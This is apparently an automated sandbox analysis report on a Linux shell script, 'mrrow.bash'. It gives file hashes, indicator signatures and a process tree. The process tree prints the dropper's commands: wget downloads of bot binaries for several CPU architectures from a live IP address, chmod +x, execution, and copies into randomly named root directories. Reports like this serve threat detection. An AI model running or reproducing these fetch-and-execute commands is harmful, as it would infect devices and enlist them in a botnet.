Resubmissions
09-08-2022 19:31
220809-x8ezrafabp 509-08-2022 19:22
220809-x28cqaehdq 509-08-2022 19:21
220809-x2ny3sgec6 5Analysis
-
max time kernel
0s -
max time network
158s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-08-2022 19:22
Static task
static1
Behavioral task
behavioral1
Sample
mrrow.bash
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
mrrow.bash
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
mrrow.bash
Resource
debian9-mipsbe-en-20211208
Behavioral task
behavioral4
Sample
mrrow.bash
Resource
debian9-mipsel-en-20211208
General
-
Target
mrrow.bash
-
Size
2KB
-
MD5
9486bdff70b6ec6243b012a91e90c21e
-
SHA1
2364e70ee0d49e4e641fa7428958f5907a8c26a3
-
SHA256
2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
-
SHA512
e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd
Malware Config
Signatures
-
Reads runtime system information 6 IoCs
Reads data from /proc virtual filesystem.
Processes:
mvmkdirmvmkdirdescription ioc process /proc/filesystems /proc/filesystems mv /proc/398/exe /proc/398/exe /proc/filesystems /proc/filesystems mkdir /proc/filesystems /proc/filesystems mv /proc/387/exe /proc/387/exe /proc/filesystems /proc/filesystems mkdir -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
mrrow.bashdescription ioc process /tmp/mrrow.bash /tmp/mrrow.bash mrrow.bash
Processes
-
/tmp/mrrow.bash/tmp/mrrow.bash sudo1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.mips2⤵
-
/bin/catcat bot.mips2⤵
-
/bin/chmodchmod +x bot.mips fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq52⤵
-
./fuwwyowo./fuwwyowo ssh2⤵
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.mpsl2⤵
-
/bin/catcat bot.mpsl2⤵
-
/bin/chmodchmod +x bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq52⤵
-
./fuwwyowo./fuwwyowo ssh2⤵
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.arm2⤵
-
/bin/catcat bot.arm2⤵
-
/bin/chmodchmod +x bot.arm bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq52⤵
-
./fuwwyowo./fuwwyowo ssh2⤵
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.arm52⤵
-
/bin/catcat bot.arm52⤵
-
/bin/chmodchmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq52⤵
-
./fuwwyowo./fuwwyowo ssh2⤵
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.arm62⤵
-
/bin/catcat bot.arm62⤵
-
/bin/chmodchmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo mrrow.bash systemd-private-fe6e25270ab24b498dda7e817c5daab8-systemd-timesyncd.service-twUfq52⤵
-
./fuwwyowo./fuwwyowo ssh2⤵
-
/usr/bin/wgetwget http://109.206.241.211/bins/bot.arm72⤵
-
/bin/shsh -c "mkdir /qaujoxnrr1/ && >/qaujoxnrr1/qaujoxnrr1 && cd /qaujoxnrr1/ >/dev/null"1⤵
-
/bin/mkdirmkdir /qaujoxnrr1/2⤵
- Reads runtime system information
-
/bin/shsh -c "mv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr1 && chmod 777 /qaujoxnrr1/qaujoxnrr1 >/dev/null"1⤵
-
/bin/mvmv /tmp/fuwwyowo /qaujoxnrr1/qaujoxnrr12⤵
- Reads runtime system information
-
/bin/chmodchmod 777 /qaujoxnrr1/qaujoxnrr12⤵
-
/bin/shsh -c "mkdir /d691shta9j/ && >/d691shta9j/d691shta9j && cd /d691shta9j/ >/dev/null"1⤵
-
/bin/mkdirmkdir /d691shta9j/2⤵
- Reads runtime system information
-
/bin/shsh -c "mv /tmp/fuwwyowo /d691shta9j/d691shta9j && chmod 777 /d691shta9j/d691shta9j >/dev/null"1⤵
-
/bin/mvmv /tmp/fuwwyowo /d691shta9j/d691shta9j2⤵
- Reads runtime system information
-
/bin/chmodchmod 777 /d691shta9j/d691shta9j2⤵